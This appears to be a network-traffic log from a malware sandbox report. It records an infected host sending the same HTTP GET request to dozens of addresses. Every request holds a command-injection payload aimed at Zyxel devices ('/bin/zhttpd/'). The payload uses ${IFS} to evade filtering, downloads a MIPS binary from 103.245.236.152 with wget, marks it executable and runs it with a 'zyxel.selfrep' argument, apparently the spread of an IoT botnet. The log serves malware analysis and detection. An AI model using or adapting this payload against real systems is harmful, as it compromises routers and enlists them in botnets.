                                        Jan 14, 2024 16:18:38.304234982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2605192.168.2.1360008148.207.194.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304266930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2606192.168.2.1341310204.33.226.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304318905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2607192.168.2.1350328183.210.167.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304375887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2608192.168.2.134576088.229.190.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304414034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2609192.168.2.135916667.136.56.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304472923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2610192.168.2.1348202134.145.255.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304514885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2611192.168.2.13406922.222.117.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304560900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2612192.168.2.1335012131.159.191.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304604053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2613192.168.2.1358884153.51.238.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304640055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2614192.168.2.134167658.35.198.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304675102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2615192.168.2.1352712166.20.45.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304730892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2616192.168.2.135101484.251.89.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304784060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2617192.168.2.135634098.146.21.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304833889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2618192.168.2.134999291.146.214.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304869890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2619192.168.2.135581242.250.186.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304918051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2620192.168.2.1337572197.139.146.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304933071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2621192.168.2.13583904.11.211.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304975033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2622192.168.2.1349928159.172.72.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305057049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2623192.168.2.133335493.132.37.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305099010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2624192.168.2.1340794150.184.39.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305130005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2625192.168.2.1356680206.10.103.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305169106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2626192.168.2.13453485.19.1.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305214882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2627192.168.2.1333916222.203.129.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305267096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2628192.168.2.1334354200.40.9.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305299044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2629192.168.2.134410691.21.211.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305334091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2630192.168.2.135447469.28.141.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305360079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2631192.168.2.1334780178.142.169.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305394888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2632192.168.2.133843825.124.191.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305423975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2633192.168.2.1333890144.13.179.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305453062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2634192.168.2.1355906112.48.50.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305501938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2635192.168.2.134225449.70.16.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305541992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2636192.168.2.1356704148.189.160.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305572033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2637192.168.2.1351752191.48.206.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305608988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2638192.168.2.1343862109.45.152.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305664062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2639192.168.2.1342494183.226.102.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305706978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2640192.168.2.1338980171.127.164.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305732965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2641192.168.2.134180838.60.62.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305769920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2642192.168.2.1334374157.131.138.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305813074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2643192.168.2.13550162.183.136.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305840015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2644192.168.2.134212474.35.255.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305893898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2645192.168.2.1358768193.199.44.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305937052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2646192.168.2.1345218210.132.106.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.305978060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2647192.168.2.1349480157.167.175.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306018114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2648192.168.2.1350914186.217.99.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306047916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2649192.168.2.1339670213.193.211.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306108952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2650192.168.2.134519236.105.224.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306149006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2651192.168.2.134893287.128.75.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306181908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2652192.168.2.134496282.208.37.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306212902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2653192.168.2.133611894.5.67.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306252956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2654192.168.2.133280460.193.18.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306288958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2655192.168.2.13552701.151.140.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306341887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2656192.168.2.1352264182.237.85.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306365967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2657192.168.2.135254664.137.126.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306396008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2658192.168.2.1339478115.51.235.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306416988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2659192.168.2.1348716133.9.177.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306461096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2660192.168.2.1359446159.108.130.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306504011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2661192.168.2.1336382186.78.117.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306565046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2662192.168.2.1333260189.84.187.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306580067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2663192.168.2.134005663.203.213.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306647062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2664192.168.2.1359870104.184.103.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306679010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2665192.168.2.1356064159.128.16.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306726933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2666192.168.2.135070467.206.29.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306752920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2667192.168.2.1338520133.37.151.232443
                                        TimestampBytes transferredDirectionData
